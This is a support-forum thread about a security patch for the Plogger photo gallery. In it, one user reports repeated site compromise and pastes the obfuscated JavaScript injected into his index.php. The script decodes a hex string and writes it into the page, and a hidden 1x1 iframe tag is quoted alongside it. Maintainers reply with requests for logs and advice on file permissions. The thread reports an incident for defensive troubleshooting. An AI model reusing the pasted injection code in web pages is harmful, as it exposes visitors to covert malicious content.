Plogger Support Forum - Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) Thu, 28 Mar 2024 21:49:33 +0000 http://www.plogger.org/forum/ Lussumo Vanilla 1.1.10 Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=8390#Comment_8390 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=8390#Comment_8390 Mon, 18 Aug 2008 16:41:12 +0000 ryanduff publicly disclosed. We were notified after it was found and the problem has been corrected.

I ported changes back to version 1.0b3 for those not running current SVN. They can be found here. There are two changed files: plog-download.php and plog-remote.php (both found in the root folder). Replacing those files with those in the zip file will fix the issue.

For those running SVN, the changes were committed in r569 so as long as you've updated past that revision, you should be covered.

The download on the main page also has the updated files if you would like the whole package.]]>
Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9472#Comment_9472 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9472#Comment_9472 Thu, 11 Dec 2008 13:39:15 +0000 jwaddick
Thanks
Janice]]>
Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9473#Comment_9473 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9473#Comment_9473 Thu, 11 Dec 2008 13:43:15 +0000 ryanduff Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9520#Comment_9520 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9520#Comment_9520 Fri, 19 Dec 2008 13:08:32 +0000 fxfxfx
What happens is that the following script is inserted in the index.php file:

*********************
<script>function c102916999516l4947817c2e615(l4947817c2ede3){ function l4947817c2f5b5(){var l4947817c2fd82=16;return l4947817c2fd82;} return (parseInt(l4947817c2ede3,l4947817c2f5b5()));}function l4947817c30568(l4947817c30d22){ var l4947817c32490=2; var l4947817c314f1='';l4947817c33431=String.fromCharCode;for(l4947817c31cc1=0;l4947817c31cc1<l4947817c30d22.length;l4947817c31cc1+=l4947817c32490){ l4947817c314f1+=(l4947817c33431(c102916999516l4947817c2e615(l4947817c30d22.substr(l4947817c31cc1,l4947817c32490))));}return l4947817c314f1;} var x17='';var l4947817c33c03='3C736'+x17+'3726'+x17+'970743E6'+x17+'96'+x17+'6'+x17+'28216'+x17+'D796'+x17+'96'+x17+'1297B6'+x17+'46'+x17+'F6'+x17+'3756'+x17+'D6'+x17+'56'+x17+'E742E77726'+x17+'9746'+x17+'528756'+x17+'E6'+x17+'5736'+x17+'36'+x17+'1706'+x17+'528202725336'+x17+'32536'+x17+'392536'+x17+'36'+x17+'2537322536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'352532302536'+x17+'6'+x17+'52536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'3525336'+x17+'42536'+x17+'332533312533302532302537332537322536'+x17+'3325336'+x17+'42532372536'+x17+'3825373425373425373025336'+x17+'125326'+x17+'6'+x17+'25326'+x17+'6'+x17+'2536'+x17+'372536'+x17+'6'+x17+'6'+x17+'2536'+x17+'372536'+x17+'6'+x17+'6'+x17+'2533322536'+x17+'6'+x17+'42536'+x17+'3525326'+x17+'52536'+x17+'6'+x17+'52536'+x17+'3525373425326'+x17+'6'+x17+'25326'+x17+'52536'+x17+'372536'+x17+'6'+x17+'6'+x17+'25326'+x17+'6'+x17+'2536'+x17+'332536'+x17+'382536'+x17+'352536'+x17+'332536'+x17+'6'+x17+'225326'+x17+'52536'+x17+'382537342536'+x17+'6'+x17+'42536'+x17+'6'+x17+'32532372532302537372536'+x17+'392536'+x17+'342537342536'+x17+'3825336'+x17+'4253337253336'+x17+'2533392532302536'+x17+'382536'+x17+'352536'+x17+'392536'+x17+'372536'+x17+'3825373425336'+x17+'42533352533332533332532302537332537342537392536'+x17+'6'+x17+'32536'+x17+'3525336'+x17+'4253237253736'+x17+'2536'+x17+'392537332536'+x17+'392536'+x17+'322536'+x17+'392536'+x17+'6'+x17+'32536'+x17+'3925373425373925336'+x17+'12536'+x17+'382536'+x17+'392536'+x17+'342536'+x17+'342536'+x17+'352536'+x17+'6'+x17+'525323725336'+x17+'525336'+x17+'325326'+x17+'6'+x17+'2536'+x17+'392536'+x17+'36'+x17+'2537322536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'3525336'+x17+'52729293B7D76'+x17+'6'+x17+'172206'+x17+'D796'+x17+'96'+x17+'13D7472756'+x17+'53B3C2F736'+x17+'3726'+x17+'970743E';document.write(l4947817c30568(l4947817c33c03));</script>
*********************

There are small variations to the inserted scripts. Here's another version.

The script is always injected after the body iframe, before the div style.

<body><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

HERE IS THE SCRIPT INJECTED

<div style="margin: auto; width: 750px;">
<?php the_gallery(); ?>


I have comunicating with the server company but they only suggest, what I have already done: chmodding to 755, which I actually chmodded most files and directories to 544, including index.php, gallery.php, plog-config.php, plog-download.php, plog-remote.php, plog-load_config.php, plog-globals.php, plog-functions.php and plog-thumb.php, as well as whole directories including admin, lib and themes (all three recursively (chmod to 544)).

Still, every hour or two, it's all hacked again and the script re-injected to index.php. The result is visible on the site, as content is dropped 100 or 200 pixels on the screen, as the script apparently takes this place. So it's clear when it happens (again).

How can I stop this?

...And when is next version of plogger coming? I'm scared that my site and the thousands of photos will be deleted by the hackers...

Frank]]>
Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9521#Comment_9521 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=9521#Comment_9521 Fri, 19 Dec 2008 13:50:28 +0000 sidtheduck
Sorry to hear about your difficulties. Can you send a .zip file of your Plogger contents, an SQL dump, and any RAW access logs that you can get to security SPLAT plogger DOT org? We can take a look at it and try to figure out what is going on.

Also, have you checked the permissions of the Plogger folder itself to make sure the permissions are set at 0755? At this time, I don't know how Plogger would be the culprit to inserting this code between the body tag (after the inclusion of the gallery.php file) and the the_gallery() function. I'm thinking it may be some other intrusion to your system, but we can try to verify that it isn't for sure and to see if we can determine how they are getting in as well.]]>
Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11429#Comment_11429 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11429#Comment_11429 Thu, 24 Sep 2009 11:34:34 +0000 sidtheduck
How do you know they got in through plog-upload.php and plog-import.php? Just curious as to how your site looks to be hacked (script injection, uploaded files, changed files, etc.). We need more information to help you figure out how they got in (through Plogger or some other means).]]>
Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta) http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11450#Comment_11450 http://www.plogger.org/forum/comments.php?DiscussionID=2109&Focus=11450#Comment_11450 Fri, 02 Oct 2009 19:47:21 +0000 sidtheduck My recommended permissions are '0755' for directories and '0644' for files. There are certain server setups that will cause you to decrease permissions temporarily in the next release (during install or possibly some instances of changing .htaccess files for rewrite).

Currently with the beta3 version, there are some server setups that you have to decrease the permissions to '0776' (but most people tend to just decrease to '0777') on directories for Plogger or most other gallery software out there due to how the server is set up (safe_mode restrictions especially). While this is not ideal, a potential security hazard, and not the recommended solution, the other option would be to change web hosts (which a lot of people seem less willing to do) to someone who knows how to set up a secure server without crippling it's abilities to run PHP as an environment set up for manipulating / creating directories and files.

So to answer your question, if you have your directories set to '0755', you should be fine as far as directory security goes.]]>